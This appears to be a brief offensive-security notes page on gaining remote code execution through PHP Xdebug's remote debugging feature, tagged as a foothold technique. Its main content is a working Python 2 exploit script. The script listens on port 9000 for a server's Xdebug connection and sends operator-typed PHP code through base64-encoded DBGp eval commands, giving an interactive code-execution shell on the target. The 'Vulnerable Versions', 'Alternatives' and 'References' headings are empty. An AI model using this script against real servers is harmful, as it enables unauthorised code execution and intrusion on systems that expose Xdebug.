PHP XDebug

php, rce, foothold

Overview #

Xdebug is a PHP debugging tool that supports remote debugging of PHP code on the server through source code locally. Xdebug has powerful functions, and there have been many articles about its configuration recently. The idea of digging the attack surface of Xdebug was born a long time ago, and finally I did it today, a day suitable for paddling.

Vulnerable Versions #

Example Exploit Scripts #

#!/usr/bin/python2
import socket

ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()

while True:
    client_data = conn.recv(1024)
    print(client_data)

    data = raw_input('>> ')
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))

Alternatives #

References #